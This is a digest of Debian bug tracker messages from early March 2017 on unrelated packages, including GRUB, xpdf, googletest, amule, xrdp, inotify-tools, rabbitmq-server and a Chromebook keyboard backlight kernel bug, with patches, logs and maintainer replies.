Bug#711019: load_video produces "file not found" errors and causes GRUB to pause when booting

[BOITEUX, Frederic]

Hello,

  I was also hit by this grub problem on a system upgraded [at least] from 
Wheezy to Jessie. It was fixed by simply re-playing 'grub-install' on the boot 
disk ("grub-install /dev/sda" in my case).

With regards,
Fred.
This message contains information that may be privileged or confidential and is 
the property of the Capgemini Group. It is intended only for the person to whom 
it is addressed. If you are not the intended recipient, you are not authorized 
to read, print, retain, copy, disseminate, distribute, or use this message or 
any part thereof. If you receive this message in error, please notify the 
sender immediately and delete all copies of this message.

Bug#856652: RFS: xpdf/3.0.4.real-4

[Svante Signell]

On Sun, 2017-03-05 at 17:36 -0700, Sean Whitton wrote:
> control: noowner -1
> 
> Dear Svante,
> 
> On Sun, Mar 05, 2017 at 01:56:59AM +0100, Svante Signell wrote:
> > On Sat, 2017-03-04 at 17:39 -0700, Sean Whitton wrote:
> > > I'm not referring to currently known security issues.  I'm referring
> > > to issues that are yet to be discovered.
> > 
> > OK, got it. Are you still interested to sponsor this package, now when
> > you know about status quo? If so, I'll create an account at
> > alioth.debian.org and we'll continue from there.
> 
> I was hoping that you could provide a counter-argument to allay my
> concerns about security.  Since you don't seem to have a response to the
> issues I've raised, I wouldn't be comfortable uploading xpdf.

What do you expect me to say? Of course I take security seriously. Are there any
known security issues in the upstream xpdf? If so, they should of course be
forwarded to upstream ASAP, and fixed immediately in the Debian version. I would
of course make a new release as soon as any problems have been known, and fixed.
And what is the situation with poppler? Are they, as upstream much stronger in
this respect?

> > Just a sidenote: I've been using xpdf myself for many years, and found
> > it a nice piece of standalone software. I'd really be sad to see it
> > disappear from Debian. My search for good alternatives has not been
> > successful so far. One issue is that I don't need is to edit the
> > pdf. I don't even know if xpdf supports that?
> 
> Have you tried okular?
> 
> Anyway, thanks again for getting involved with this orphaned package.

Thank you too.

Bug#856915: googletest FTCBFS: python build dependency not installable

[Helmut Grohne]

Source: googletest
Version: 1.8.0-6
Tags: patch
User: helm...@debian.org
Usertags: rebootstrap

googletest fails to cross build from source, because its build
dependencies are not installable. More specifically, it requests python
for the host architecture. A host architecture python is neither
installable nor executable. What googletest really wanted was a build
architecture python, because python is exclusively used as a tool.
Annotating the dependency with :any or :native fixes the cross build.
Please consider applying the attached patch after stretch is released.

Helmut
diff --minimal -Nru googletest-1.8.0/debian/changelog 
googletest-1.8.0/debian/changelog
--- googletest-1.8.0/debian/changelog   2016-12-23 06:24:15.0 +0100
+++ googletest-1.8.0/debian/changelog   2017-03-06 08:24:09.0 +0100
@@ -1,3 +1,10 @@
+googletest (1.8.0-6.1) UNRELEASED; urgency=medium
+
+  * Non-maintainer upload.
+  * Annotate python build dependency with :native. Closes: #-1.
+
+ -- Helmut Grohne   Mon, 06 Mar 2017 08:24:09 +0100
+
 googletest (1.8.0-6) unstable; urgency=medium
 
   * [d806ccb] Remove m68k-disable-getthreadcounttest.patch: it was based
diff --minimal -Nru googletest-1.8.0/debian/control 
googletest-1.8.0/debian/control
--- googletest-1.8.0/debian/control 2016-12-23 06:24:15.0 +0100
+++ googletest-1.8.0/debian/control 2017-03-06 08:24:05.0 +0100
@@ -4,7 +4,7 @@
 Maintainer: Steve M. Robbins 
 Uploaders: Giuseppe Iuculano , Fredrik Hallenberg 

 Priority: optional
-Build-Depends: debhelper (>= 9), cmake, python
+Build-Depends: debhelper (>= 9), cmake, python:native
 Standards-Version: 3.9.8
 Vcs-Git: git://anonscm.debian.org/collab-maint/gtest.git
 Vcs-Browser: https://anonscm.debian.org/gitweb/?p=collab-maint/gtest.git

Bug#856914: amule: [amulegui] amulegui crashes when connecting

[Federico]

Package: amule
Version: 1:2.3.2-1+b2
Severity: normal

Dear Maintainer,

amulegui crashed when connecting to daemon.

2017-03-06 08:21:29 (remote-GUI): Checking if there is an instance already
running...
 2017-03-06 08:21:29 (remote-GUI): No other instances are running.
 2017-03-06 08:21:29 (remote-GUI): Asio thread 1 started
 2017-03-06 08:21:29 (remote-GUI): Asio thread 2 started
 2017-03-06 08:21:29 (remote-GUI): Asio thread 3 started
 2017-03-06 08:21:29 (remote-GUI): Asio thread 4 started
 2017-03-06 08:21:37 (remote-GUI): Connecting...
 2017-03-06 08:21:37 (remote-GUI): Going to event loop...
 2017-03-06 08:21:37 (remote-GUI): Remote GUI EC event handler
../src/common/socket.cpp(292): assert "wxIsMainThread()" failed in Init():
sockets must be initialized from the main thread [in thread 7f872b3e6700]

Call stack:
[00] wxOnAssert(char const*, int, char const*, char const*, char const*)
[01] 0x7f8745d0d439
[02] wxSocketClient::DoConnect(wxSockAddress const&, wxSockAddress const*,
bool)
[03] wxHTTP::GetInputStream(wxString const&)
[04] 0x55e7950fbb5e
[05] 0x55e7950fd42a
[06] wxThread::CallEntry()
[07] 0x7f8745a01453
[08] 0x7f874754f424
[09] clone

Do you mind investigating?



-- System Information:
Debian Release: 9.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.9.0-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_IE.UTF-8, LC_CTYPE=en_IE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages amule depends on:
ii  amule-common   1:2.3.2-1
ii  libboost-system1.62.0  1.62.0+dfsg-4
ii  libc6  2.24-9
ii  libcrypto++6   5.6.4-6
ii  libgcc11:6.3.0-6
ii  libgeoip1  1.6.9-4
ii  libstdc++6 6.3.0-6
ii  libupnp6   1:1.6.19+git20160116-1.2
ii  libwxbase3.0-0v5   3.0.2+dfsg-3
ii  libwxgtk3.0-0v53.0.2+dfsg-3
ii  zlib1g 1:1.2.8.dfsg-5

Versions of packages amule recommends:
ii  amule-utils  1:2.3.2-1+b2
ii  unzip6.0-21

Versions of packages amule suggests:
ii  amule-utils-gui  1:2.3.2-1+b2

-- no debconf information

Bug#856405: unblock: libdebian-installer/0.109 and others

[Bastian Blank]

On Fri, Mar 03, 2017 at 08:25:11AM +0100, Bastian Blank wrote:
> I'm taking over this matter as maintainer of this code and discrepances
> on what needs to be changed exactly.

Uploaded, please unblock.

unblock libdebian-installer/0.109
unblock anna/1.58
unblock main-menu/1.51
unblock cdebootstrap/0.7.7

unblock-udeb libdebian-installer/0.109
unblock-udeb anna/1.58
unblock-udeb main-menu/1.51

Bastian

-- 
Men of peace usually are [brave].
-- Spock, "The Savage Curtain", stardate 5906.5

Bug#856913: Please include conf files for scripts in /usr/share/debdelta

[Saikrishna Arcot]

Package: debdelta

Version: 0.59

It would help including a default/templated version of the conf files
necessary for the scripts installed in /usr/share/debdelta. That way,
someone who wants to set up debdelta for a repo can do so easily and not
have to go to the source code to get a default conf file.


-- 
Saikrishna Arcot




signature.asc
Description: OpenPGP digital signature

Bug#855359: [Pkg-phototools-devel] Bug#855359: darktable: 2.2.1 binary very slow compared to self-compiled

[Matthias Bodenbinder]

Am 05.03.2017 um 18:41 schrieb David Bremner:
> I'm not able to reproduce the large difference between the debian
> package and compiling with
> 
>  ./build.sh --disable-gnome-keyring --build-type Release
> 
> On my machine (an older i7), I get an average of 40s to export with
> 2.2.3-2 (compiled with -O3, just uploaded) and an average of 39s with
> the build.sh produced binary.  In both cases the time is dominated by
> the non-local means noise reduction (about 24s).
>
> Looking only at the time in the equalizer module, the improvement is a
> slightly larger (as a percentage) 7.9 seconds for build.sh versions 8.5
> seconds for the debian package. Given we can't use -march=native or
> -mtune=native, that's probably an acceptable slowdown.

This is really interesting. And puzzling. 

I am wondering if it has to do with the fact that I am using the latest Kaby 
Lake CPU i7-7700k? 

The Equalizer module in my case improves from 6,9 s to 3,0 s and non-local 
means noise reduction improves from 10,3 s to 8,7 s. 

They both sum up to 17,2 s with the debian testing binary and 11,7 s with my 
self-compiled binary. This is a 32% difference. 

What else can I do to help debugging? 

Matthias

Bug#856848: unblock: aptitude/0.8.6-1 (pre-approval)

[Niels Thykier]

Control: tags -1 confirmed moreinfo

Manuel A. Fernandez Montecelo:
> Hi,
> 
> 2017-03-05 15:15 GMT+01:00 Niels Thykier :
>>
>> At first glance it looks reasonable, but could you please provide a
>> debdiff of the changes for a second review.
> 
> Sure.
> 
> For the upstream side of the changes I recommend the previous diff,
> but this is the full-ish debdiff (without translations and so on).
> 
> debdiff --exclude '*.po' --exclude '*.pot' --exclude 'configure*'
> --exclude '*.gmo' aptitude_0.8.[56]-1.dsc >
> /tmp/aptitude-for-stretch.debdiff
> 
> 

Hi,

Please go ahead and remove the moreinfo tag once the upload has been
successfully built on all relevant release architectures.

Thanks,
~Niels

Bug#856821: closed by Ben Hutchings <b...@decadent.org.uk> (Re: Bug#856821: firmware-linux-nonfree: romheaders of R420_cp.bin for ati x800 xt agp gfx card in package not OK.)

[Mark Balantzyan]

Hi Ben,

Thanks for the reply. Do you think you could show me the steps to obtain gpu 
microcode for my card via, say, dmidecode, and inject that to get gpu 
acceleration? Surely there must be some reasonable shortcut short of going 
heavy into the kernel source. And if, in fact that's necess, is there a patch? 
I recognize G5's are passé, but I like the system.

There is certainly some bugginess going on, can't cp the vga bios from 
sys/devices without a kernel breach alert after echoing 1etc.

Thank you

> On Mar 4, 2017, at 8:15 PM, Debian Bug Tracking System 
>  wrote:
> 
> This is an automatic notification regarding your Bug report
> which was filed against the firmware-linux-nonfree package:
> 
> #856821: firmware-linux-nonfree: romheaders of R420_cp.bin for ati x800 xt 
> agp gfx card in package not OK.
> 
> It has been closed by Ben Hutchings .
> 
> Their explanation is attached below along with your original report.
> If this explanation is unsatisfactory and you have not received a
> better one in a separate message then please contact Ben Hutchings 
>  by
> replying to this email.
> 
> 
> -- 
> 856821: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=856821
> Debian Bug Tracking System
> Contact ow...@bugs.debian.org with problems
> 
> 

Bug#856912: [src:archvsync] typo in Maintainer field

[Peter Palfrader]

control: tag -1 pending

On Mon, 06 Mar 2017, Konstantin Demin wrote:

> Source: archvsync
> Version: 20170204
> Severity: minor
> 
> Please fix typo in "Maintainer" field:
> -Maintainer: Debiab Mirror Team 
> +Maintainer: Debian Mirror Team 

Already reported as a btw in #856695 and fixed in git days ago.

-- 
|  .''`.   ** Debian **
  Peter Palfrader   | : :' :  The  universal
 https://www.palfrader.org/ | `. `'  Operating System
|   `-https://www.debian.org/

Bug#856912: [src:archvsync] typo in Maintainer field

[Konstantin Demin]

Source: archvsync
Version: 20170204
Severity: minor

Please fix typo in "Maintainer" field:
-Maintainer: Debiab Mirror Team 
+Maintainer: Debian Mirror Team 

--
SY,
Konstantin Demin

Bug#856911: firefox: Firefox menus (right-click, hamburger, top) often do not open

[Matthew Flaschen]

Package: firefox
Version: 51.0.1-3~bpo80+1
Severity: important
Tags: upstream

Dear Maintainer,

Filed upstream at https://bugzilla.mozilla.org/show_bug.cgi?id=1344620

User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Build ID: 20170125094131

Steps to reproduce:

I'm on Firefox 51 on Debian Jessie.  This is reproducible both on upstream 
firefox (from getfirefox.com) and on the Debian-packaged one (still 51, from 
below sources.list.d):

---
deb http://mozilla.debian.net/ jessie-backports firefox-release
deb-src http://mozilla.debian.net/ jessie-backports firefox-release
---

1. Create a fresh profile (or even a fresh OS user).
2. Go to example.com (or any other site)
3. Try to open right-click menus, the menus at the top, and the hamburger menu



Actual results:

Often these menus (right-click menus, the menus at the top, and the hamburger 
menu) will not open.

It then sometimes resumes working.



Expected results:

The menus should open normally each time.



-- Package-specific info:


-- Addons package information

-- System Information:
Debian Release: 8.7
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages firefox depends on:
ii  debianutils   4.4+b1
ii  fontconfig2.11.0-6.3+deb8u1
ii  libasound21.0.28-1
ii  libatk1.0-0   2.14.0-1
ii  libc6 2.19-18+deb8u7
ii  libcairo-gobject2 1.14.0-2.1+deb8u2
ii  libcairo2 1.14.0-2.1+deb8u2
ii  libdbus-1-3   1.8.22-0+deb8u1
ii  libdbus-glib-1-2  0.102-1
ii  libevent-2.0-52.0.21-stable-2+deb8u1
ii  libffi6   3.1-2+b2
ii  libfontconfig12.11.0-6.3+deb8u1
ii  libfreetype6  2.5.2-3+deb8u1
ii  libgcc1   1:4.9.2-10
ii  libgdk-pixbuf2.0-02.31.1-2+deb8u5
ii  libglib2.0-0  2.42.1-1+b1
ii  libgtk-3-03.14.5-1+deb8u1
ii  libgtk2.0-0   2.24.25-3+deb8u1
ii  libhunspell-1.3-0 1.3.3-3
ii  libpango-1.0-01.36.8-3
ii  libsqlite3-0  3.8.7.1-1+deb8u2
ii  libstartup-notification0  0.12-4
ii  libstdc++64.9.2-10
ii  libx11-6  2:1.6.2-3
ii  libx11-xcb1   2:1.6.2-3
ii  libxcb-shm0   1.10-3+b1
ii  libxcb1   1.10-3+b1
ii  libxcomposite11:0.4.4-1
ii  libxdamage1   1:1.1.4-2+b1
ii  libxext6  2:1.3.3-1
ii  libxfixes31:5.0.1-2+b2
ii  libxrender1   1:0.9.8-1+b1
ii  libxt61:1.1.4-1+b1
ii  procps2:3.3.9-9
ii  zlib1g1:1.2.8.dfsg-2+b1

firefox recommends no packages.

Versions of packages firefox suggests:
pn  fonts-lmodern  
pn  fonts-stix | otf-stix  
ii  libcanberra0   0.30-2.1
ii  libgssapi-krb5-2   1.12.1+dfsg-19+deb8u2
pn  mozplugger 

-- no debconf information

Bug#848198:

[Yao Wei]

Seems good. I was on the mobile phone and the download link didn't appear
for the mobile.
On Mon, 6 Mar 2017 at 11:11 Anthony Wong  wrote:

> Hi Yao Wei,
>
> I see there is a colour one at
> https://www.google.com/get/noto/#emoji-zsye-color, should we give this
> one a shot instead?
>
> Thanks,
> Anthony
>
>
> On 6 March 2017 at 10:49, Yao Wei  wrote:
>
> However prebuilt Noto Color Emoji isn't in the original repository but in
> Android source. The TTF in the repo is old greyscale Emoji. If that's
> considered okay I can go that way.
> On Mon, 6 Mar 2017 at 03:18 Anthony Wong  wrote:
>
> Hi,
>
> I wonder if we can skip building it from source and just package the
> pre-built font file provided by Google? Like what we are doing with Noto
> CJK font.
> The license of the font file is SIL Open Font License Version 1.1, as far
> as I check.
>
> Thanks,
> Anthony Wong
>
>
>

Bug#840132: xrdp-sesman.service sometimes fails to start on boot

[David Gilmour]

On Tue, 28 Feb 2017 15:07:39 +0100 Paul van Tilburg  wrote:
> Hi!
>
> I have been struggling with the same issues.  Because we want to offer a
> GNOME desktop, NetworkManager is installed.  The way it configures the
> network might reveal an issue in xrdp itself.
>
> I have updated the xrdp.service unit locally and that seems to fix it
> (see attached file).
>
> The changes are:
>
>   --- /lib/systemd/system/xrdp.service2017-01-25 18:10:11.0 +0100
>   +++ /etc/systemd/system/xrdp.service2017-02-28 15:07:01.130060204 +0100
>   @@ -1,8 +1,7 @@
>[Unit]
>Description=xrdp daemon
>Documentation=man:xrdp(8) man:xrdp.ini(5)
>   -Requires=xrdp-sesman.service
>   -After=network.target xrdp-sesman.service
>   +After=network-online.target
>
>[Service]
>Type=forking
>
> The after requirement on network-online.target is not how it should be,
> but it seems necessary for xrdp to start.  The require on xrdp-sesman is
> not necessary at all (given that xrdp-sesman.service binds to
> xrdp.service), so I dropped that.
>
> Paul
>
> --
> Using the Power of Debian GNU/Linux  | E-mail: pau...@debian.org
> Jabber/XMPP: p...@luon.net   | GnuPG key ID: 0x50064181

Paul, unfortunately it didn’t seem to work for me:

root@pod:/home/david# systemctl status xrdp

● xrdp.service - xrdp daemon

   Loaded: loaded (/etc/systemd/system/xrdp.service; enabled; vendor preset: 
enabled)

   Active: failed (Result: resources) since Sun 2017-03-05 21:39:49 PST; 56s ago

 Docs: man:xrdp(8)

   man:xrdp.ini(5)

  Process: 873 ExecStart=/usr/sbin/xrdp $XRDP_OPTIONS (code=exited, 
status=0/SUCCESS)

  Process: 849 ExecStartPre=/bin/sh /usr/share/xrdp/socksetup (code=exited, 
status=0/SUCCESS)



Mar 05 21:39:46 pod systemd[1]: Starting xrdp daemon...

Mar 05 21:39:46 pod systemd[1]: xrdp.service: PID file /run/xrdp/xrdp.pid not 
readable (yet?) after start: No such file or directory

Mar 05 21:39:48 pod xrdp[1119]: (1119)(139942974253888)[INFO ] starting xrdp 
with pid 1119

Mar 05 21:39:49 pod xrdp[1119]: (1119)(139942974253888)[ERROR] 
xrdp_listen_main_loop: listen error, possible port already in use

Mar 05 21:39:49 pod xrdp[1119]: (1119)(139942974253888)[DEBUG] Closed socket 11 
(AF_INET6 :: port 0)

Mar 05 21:39:49 pod systemd[1]: xrdp.service: Daemon never wrote its PID file. 
Failing.

Mar 05 21:39:49 pod systemd[1]: Failed to start xrdp daemon.

Mar 05 21:39:49 pod systemd[1]: xrdp.service: Unit entered failed state.

Mar 05 21:39:49 pod systemd[1]: xrdp.service: Failed with result 'resources'.

root@pod:/home/david# systemctl status xrdp-sesman

● xrdp-sesman.service - xrdp session manager

   Loaded: loaded (/lib/systemd/system/xrdp-sesman.service; enabled; vendor 
preset: enabled)

   Active: failed (Result: exit-code) since Sun 2017-03-05 21:39:47 PST; 1min 
7s ago

 Docs: man:xrdp-sesman(8)

   man:sesman.ini(5)

  Process: 1126 ExecStop=/usr/sbin/xrdp-sesman $SESMAN_OPTIONS --kill 
(code=exited, status=1/FAILURE)

  Process: 852 ExecStart=/usr/sbin/xrdp-sesman $SESMAN_OPTIONS (code=exited, 
status=0/SUCCESS)

Main PID: 1120 (code=exited, status=0/SUCCESS)



Mar 05 21:39:46 pod systemd[1]: Starting xrdp session manager...

Mar 05 21:39:46 pod xrdp-sesman[852]: (852)(140554723779904)[DEBUG] libscp 
initialized

Mar 05 21:39:47 pod xrdp-sesman[1120]: (1120)(140554723779904)[INFO ] starting 
xrdp-sesman with pid 1120

Mar 05 21:39:47 pod systemd[1]: Started xrdp session manager.

Mar 05 21:39:47 pod xrdp-sesman[1120]: (1120)(140554723779904)[ERROR] bind 
error on port '3350': 22 (Invalid argument)

Mar 05 21:39:47 pod xrdp-sesman[1120]: (1120)(140554723779904)[DEBUG] Closed 
socket 7 (AF_INET6 :: port 0)

Mar 05 21:39:47 pod systemd[1]: xrdp-sesman.service: Control process exited, 
code=exited status=1

Mar 05 21:39:47 pod systemd[1]: xrdp-sesman.service: Unit entered failed state.

Mar 05 21:39:47 pod systemd[1]: xrdp-sesman.service: Failed with result 
'exit-code'.

root@pod:/home/david# systemctl restart xrdp

root@pod:/home/david# systemctl restart xrdp-sesman

root@pod:/home/david# systemctl status xrdp

● xrdp.service - xrdp daemon

   Loaded: loaded (/etc/systemd/system/xrdp.service; enabled; vendor preset: 
enabled)

   Active: active (running) since Sun 2017-03-05 21:41:02 PST; 10s ago

 Docs: man:xrdp(8)

   man:xrdp.ini(5)

  Process: 1724 ExecStart=/usr/sbin/xrdp $XRDP_OPTIONS (code=exited, 
status=0/SUCCESS)

  Process: 1715 ExecStartPre=/bin/sh /usr/share/xrdp/socksetup (code=exited, 
status=0/SUCCESS)

Main PID: 1726 (xrdp)

Tasks: 1 (limit: 4915)

   CGroup: /system.slice/xrdp.service

   └─1726 /usr/sbin/xrdp



Mar 05 21:41:01 pod systemd[1]: Starting xrdp daemon...

Mar 05 21:41:01 pod systemd[1]: xrdp.service: PID file /run/xrdp/xrdp.pid not 
readable (yet?) after start: No such file or directory

Mar 05 21:41:02 pod systemd[1]: Started xrdp daemon.

Mar 05 21:41:03 pod xrdp[1726]: (1726)(139798253062976)[INFO 

Bug#856910: RFS: inotify-tools/3.14-3

[Dmitry Bogatov]

Package: sponsorship-requests
Severity: wishlist

Dear mentors,

I am looking for a sponsor for my package "inotify-tools"

* Package name : inotify-tools
  Version  : 3.14-3
  Upstream Author  : Radu Voicilas 
* Url  : https://github.com/rvoicilas/inotify-tools/wiki/
* Licenses : LGPL-2.1+,GPL-2.1+
  Programming Lang : C
  Section  : misc

 Inotify is a Linux kernel feature enabling user space programs to
 monitor parts of the filesystem in a efficient way. libinotifytools
 is a thin layer on top of the kernel interface which makes it easy
 to set up watches on many files at once, read events without having
 to deal with low-level I/O, and several utility functions for inotify-
 related string formatting

It builds those binary packages:

  * libinotifytools0
  * libinotifytools0-dev
  * inotify-tools

Please note, that package is maintained with dgit(1) tool using
dgit-maint-merge(7) workflow. In particular, it means that quilt
patches are squashed in source package and are not intended for
review. For more information about how to sponsor this package,
see dgit-sponsorship(7).

  Git repository: 
https://anonscm.debian.org/cgit/users/kaction-guest/inotify-tools.git
  Git branch: master
  Orig tar.gz: from tag v3.14

With /bin/sh following commands should suffice:

  $ git clone 
https://anonscm.debian.org/cgit/users/kaction-guest/inotify-tools.git 
inotify-tools
  $ cd inotify-tools
  $ git archive -o ../inotify-tools_3.14.orig.tar.xz v3.14
  $ dgit sbuild

Changes since last upload:

  * New maintainer (Closes: #856293)
  * Convert package to dgit-maint-merge workflow (patches are squashed
in uploaded source package)
  * Bump debhelper compat to 10
  * Reformat 'debian/changelog' according to DEP-5
  * Enable hardening
  * Update Vcs-* fields
  * Bump standards version (No changes needed)
  * Add lintian override concerning embedded javascript file. It is way
how doxygen works and it can not be fixed.
  * Fix segfault with cvs output when filename contains comma (Closes: #702738)

Regards,
  Dmitry Bogatov

Bug#855788: 855788 severity

[Paul Wise]

On Sun, 2017-03-05 at 23:24 +0100, Thomas Liske wrote:

> the package's core functionally is the needrestart-session command - does
> it working for you?

When I run needrestart as a user, I get a lot of processes that need
restarting but when I run needrestart-session, it says this:

Nothing found...
None of your processes need to be restarted.

> Could you please also try to run the dbus registration manually?

Looks like it is broken too, see below.

> The command should not return. Please provide any syslog entries... if
> it would work you should see something like:

The command returns and I see this in the systemd journal:

Mar 06 12:53:44 chianamo needrestart-dbus-session[20149]: 
needrestart-dbus-session 2.11 launched
Mar 06 12:53:45 chianamo needrestart-dbus-session[20149]: 
org.freedesktop.DBus.Error.Spawn.FailedToSetup: Failed to setup environment 
correctly
Mar 06 12:53:45 chianamo needrestart-dbus-session[20149]: terminated

-- 
bye,
pabs

https://wiki.debian.org/PaulWise


signature.asc
Description: This is a digitally signed message part

Bug#856909: rabbitmq-server: Heartbeat frames cause connection failure

[Troy Benjegerdes]

Package: rabbitmq-server
Version: 3.3.5-1.1+deb8u1
Severity: important
Tags: patch

Dear Maintainer,

I am attempting to use rabbitmq qith the Nodejs AMQP client, and although
upstream (from what I can tell) to have fixed issue[1], which has a patch
[2], it still seems to fail the testcase[3] reference in[1]

[1] https://github.com/rabbitmq/rabbitmq-amqp1.0/issues/6
[2] 
https://github.com/rabbitmq/rabbitmq-amqp1.0/commit/eefdfc9e4fea4e8529b2f3a67d1b57111ae74336
[3] https://github.com/mbroadst/rabbitmq-node-error

It appears that the 3.6.6-1 package fixes this issue, however it is
not in the jessie or jessie-backports archive.

-- System Information:
Debian Release: 8.7
  APT prefers stable
  APT policy: (900, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages rabbitmq-server depends on:
ii  adduser 3.113+nmu3
ii  erlang-nox  1:17.3-dfsg-4
ii  logrotate   3.8.7-1+b1

rabbitmq-server recommends no packages.

rabbitmq-server suggests no packages.

-- no debconf information

Bug#856908: gengetopt: gengetopt can't be used in cross-building

[Dima Kogan]

Package: gengetopt
Severity: normal

Hi.

Currently projects using gengetopt cannot be cross-built because

  Build-Depends: gengetopt

can only satisfy the build architecture, not the target architecture.
This can be solved by adding

  Multi-Arch:foreign

into the Package:gengetopt stanza of debian/control

Thanks!

Bug#702201: anyone?

[Alex Malinovich]

Just ran into the same problem and delaycompress took care of it. This should 
really be merged IMO.

On Sun, 26 Feb 2017 13:42:51 -0800 bbren...@gmail.com wrote:
> Any news on this? Yay/Nay? I'll vote yay.
> 
> 

Bug#856907: release.debian.org: unblock reuest: cmigemo_1.2+gh20150404-2

[Youhei SASAKI]

Package: release.debian.org
Severity: normal

Dear release manager,

Current "migemo-el" in Stretch, provided by cmigemo, uses obsolete
function "isearch-word".

When we use this package with Emacs <= 24, it's Ok.
But we can't use this package with Emacs >= 25 completely.

In stretch, default emacs is version 24, but we also provide emacs25.

I create cherry-picked version from upstream changes.
Please consider unblock, include new version into stretch.

debdiff attached.
Best Wishes,
Youhei

-- System Information:
Debian Release: 9.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-2-amd64 (SMP w/4 CPU cores)
Locale: LANG=ja_JP.UTF-8, LC_CTYPE=ja_JP.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)


cmigemo_1.2+gh0.20150404-1_to_1.2+gh0.20150404-2.diff.gz
Description: Binary data

Bug#854061: Lack of hardening=+pie gives unwanted, unsilenceable noisy compiler output

[Guillem Jover]

Control: reassign -1 gcc-6
Control: severity -1 serious
Control: affects -1 petsc
Control: affects -1 cmake
Control: affects 848129 - petsc

Hi!

On Fri, 2017-02-03 at 15:03:34 +, James Clarke wrote:
> Package: gcc-6, dpkg-dev
> Severity: important
> X-Debbugs-Cc: debian-ports-de...@lists.alioth.debian.org
> Control: block 851720 by -1

> As far as I can tell, no progress has been made on this issue since the
> few discussions on debian-devel[0]. The current state is not desirable,
> and in fact is causing at least one crucial package, cmake, to FTBFS
> (see the block above). This needs to be resolved one way or another.

The gcc patch is broken by design and it needs to be removed.
Reassigned.

Thanks,
Guillem

Bug#541157: RFP: vbam - Gameboy Advance emulator

[Sérgio Benjamim]

Hi,

Package updated, it's building and working.

https://mentors.debian.net/package/vbam

Ignore the watch file error, upstream messed with the git tag.

sergio-br2

Bug#815172: ping

[Dima Kogan]

I just hit this too. This issue makes crossbuild-essential-arch useless.

doko: is the concern in your note on this bug report still valid? If so,
what specifically prevents this migration to testing? Is there some tool
in the infrastructure that's not sufficiently Multi-Arch aware? Which
tool is it?

Since stretch is now frozen, can we please fix this in sid now, and
agree to prioritize fixing whatever is still broken in the tooling? I
can work on it if you point out the culprit.

Bug#856705: [dko...@debian.org: Bug#856705: graywolf: License violation]

[Tim Edwards]

Hello Dima,


Hi. Yeah, there're plenty of other (and better) SVD implementations.
They won't be a drop-in replacement, however because numerical recipes
uses a ridiculous matrix storage scheme:

 typedef struct {
 INTrows ;
 INTcolumns ;
 DOUBLE **m ;
 } YMBOX, *YMPTR ;

I.e. each row (or column) of a matrix is stored in a separate chunk of
(usually dynamically-allocated) memory. This is stupid, and no other
library would do it this way. So to use other implementations you might
need to write a shim to convert formats. If you find a better way,
please let me know.


I don't think it's that bad.  In graywolf, the matrix computations
appear to be restricted to exactly one routine (adapt_wire_estimator),
which is about 200 lines of code that create some matrices, fill them,
call a few standard matrix routines (multiply, add, etc.), then call
svd_solve.  It all appears to be self-contained, so as long as I can
do the same matrix functions with another library, it should be simple
to replace the Numerical Recipes code.  In other words, matrices aren't
used anywhere else in graywolf.  The matrices are created for the sole
purpose of running svd_solve, and then freed.

---Tim

++-+
| R. Timothy Edwards (Tim)   | email: t...@opencircuitdesign.com|
| Open Circuit Design| web:   http://opencircuitdesign.com |
| 19412 Cissel Manor Drive   | phone: (301) 528-5030   |
| Poolesville, MD 20837  | cell:  (408) 828-8212   |
++-+

Bug#848198:

[Anthony Wong]

Hi Yao Wei,

I see there is a colour one at
https://www.google.com/get/noto/#emoji-zsye-color, should we give this one
a shot instead?

Thanks,
Anthony

On 6 March 2017 at 10:49, Yao Wei  wrote:

> However prebuilt Noto Color Emoji isn't in the original repository but in
> Android source. The TTF in the repo is old greyscale Emoji. If that's
> considered okay I can go that way.
> On Mon, 6 Mar 2017 at 03:18 Anthony Wong  wrote:
>
>> Hi,
>>
>> I wonder if we can skip building it from source and just package the
>> pre-built font file provided by Google? Like what we are doing with Noto
>> CJK font.
>> The license of the font file is SIL Open Font License Version 1.1, as far
>> as I check.
>>
>> Thanks,
>> Anthony Wong
>>
>

Bug#856906: linux-image-4.9.0-2-amd64: Chromebook keyboard backlight not functional

[Kinsey Moore]

Package: src:linux
Version: 4.9.13-1
Severity: normal

Dear Maintainer,

*** Reporter, please consider answering these questions, where appropriate ***

   * What led up to the situation?
   Running the latest kernel.
   * What exactly did you do (or not do) that was effective (or
 ineffective)?
 I can compile the driver out of tree.
   * What was the outcome of this action?
   Once the driver (CONFIG_CROS_KBD_LED_BACKLIGHT) is compiled out of tree and 
loaded, the keyboard
   backlight works as expected.
   * What outcome did you expect instead?
   N/A

*** End of the template - remove these template lines ***


-- Package-specific info:
** Version:
Linux version 4.9.0-2-amd64 (debian-ker...@lists.debian.org) (gcc version 6.3.0 
20170205 (Debian 6.3.0-6) ) #1 SMP Debian 4.9.10-1 (2017-02-17)

** Command line:
BOOT_IMAGE=/boot/vmlinuz-4.9.0-2-amd64 
root=UUID=416b4020-5131-4c2e-8ac3-9ce34e1754d9 ro quiet

** Tainted: FWOE (12802)
 * Module has been forcibly loaded.
 * Taint on warning.
 * Out-of-tree module has been loaded.
 * Unsigned module has been loaded.

** Kernel log:
[399360.361475]  [] ? ret_from_fork+0x25/0x30
[399360.361477] ---[ end trace d4c32fbc3a677fe7 ]---
[399360.361480] ch341 1-1:1.0: device disconnected
